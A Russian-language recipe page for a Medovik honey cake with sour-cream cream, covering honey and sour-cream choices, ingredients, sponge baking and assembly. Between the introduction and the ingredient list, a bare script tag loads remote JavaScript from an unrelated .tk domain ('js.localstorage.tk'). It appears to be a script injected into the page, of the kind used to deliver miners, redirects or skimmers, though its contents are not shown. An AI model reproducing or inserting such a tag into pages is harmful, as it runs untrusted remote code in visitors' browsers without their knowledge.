Торт "Медовик" со сметанным кремом. Бабушкины рецепты

Вкусный торт медовик рецепт
Торт "Медовик" со сметанным кремом. Бабушкины рецепты

Оценить рецепт: 

4 (4 оценок)
Средне
1 час

Одна из главных причин, почему я люблю все семейные праздники, дни рождения родных – это бабушкины торты. Особенно наполеон и медовик. Вкуснее ничего в жизни не ела. И казалось бы – такие простые ингредиенты, а сладости получаются волшебные, которые съедались в первый же вечер! Не научиться готовить бабушкины шедевры было бы преступлением, поэтому мне пришлось сжечь не один корж, пока я уму-разуму у бабули научилась. С вами такого не случится – я все подробно распишу. И начну я с моего любимого медовика.
Не зря его так обозвали – важным ингредиентом данной вкуснятины является мёд. И его следует выбирать из светлых сортов – такой мед имеет менее насыщенный вкус и лучше смешивается с остальными ингредиентами. Акациевый и гречишный мёд добавят в торт немного горковатой терпкости, которая не всем придётся по вкусу. Я беру цветочный – у него приятный запах и мягкий вкус.
Если вы хотите хорошо пропитанный торт, тогда для крема выбирайте сметану с низким процентом жирности. Из жирной домашней сметаны получится густой крем, который меньше пропитает коржи, но больше останется между слоями, придавая десерту сочности и объема. Мне больше нравится медовик с нежирным кремом – пропитанные мягкие слои так и таят под вилкой. Домашние пищат от восторга, когда много жирного крема выползает из-под медовых слоев, пока ты его вилочкой «режешь». Но начнем с коржей…
<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Ингредиенты: 
Мука
2 стакана
Яйца
4 шт.
Сахар
6 ст. ложек
Мёд
6 ст. ложек
Растительное масло
3 ст. ложки
Гашеная сода
1/2 чайной ложки
Сметана
800 гр.
Лимонная цедра
1/2 часть
Рецепт торта медовик

Для того, чтобы испечь два румяненьких коржа, я начинала с яиц. Хорошенько взбиваем венчиком в мисочке до образования пенки. Как только «запузырилась» наша однородная консистенция, добавляем 3 ст. ложки мёда, растительное масло, предварительно погашенную уксусом соду, 3 ст. ложки сахара и, через ситечко, просеиваем муку. И мешаем. Хорошо мешаем, с любовью и хорошим настроением.

Простой рецепт медовика

Как говорит моя бабушка: «Как только все наши ингредиенты поженятся» мы их выливаем в заранее подготовленную форму. Тут уж смотрите сами: квадрат, круг, сердце – все, что ваша душа просит. Я беру круглую – так легче резать на порции. Форму смазываем маслом (мокните ватку в растительное масло и протрите противень/форму). Можно присыпать тонким слоем панировочных сухарей, чтобы наверняка легко было достать корж. И нашу будущую основу ставим в прогретую до 180 градусов духовку. Где будет томится наше тесто минут 25-30. Там уже смотрите по цвету – коржи должны быть светло-коричневого оттенка. Итого у вас должно получиться 2 коржа, из которых мы сделаем 4.

Рецепт медовика со сметанным кремом

Пока наши коржи пекутся – у нас достаточно времени, чтобы приготовить крем. Перед тем, как взбивать сметану, я всегда её охлаждаю в холодильнике. Так крем получается густым – воздушным. Взбиваем сметану с 3 столовыми ложками сахара, 3 столовыми ложками меда и цедрой половины лимона. Она придаст освежающий легкий привкус всему торту – попробуйте и вы не пожалеете. Я ещё добавляю немного лимонного сока.

Быстрый и простой рецепт медовика

Наши коржи тепленькими (не дайте им остыть) разрезаем на 2-е части. Итого у нас получается 4 слоя. Когда они остынут до комнатной температуры – смазываем их кремом, выкладывая нужной нам формы. Крема не жалейте – дайте будущему лакомству хорошо пропитаться. Пару столовых ложек крема оставьте на макушку. Пусть крем неровно стекает по бокам – это придаст торту своей домашней пикантности. Далее украшайте по своему вкусу: медовик можно посыпать натертыми цукатами, орехами, сушенным имбирем или кокосовой стружкой. Теперь тортик должен постоять 12 часиков в холодильнике, пропитаться и стать ещё вкуснее. И приятного аппетита ;)

Понравился рецепт? Оставьте комментарий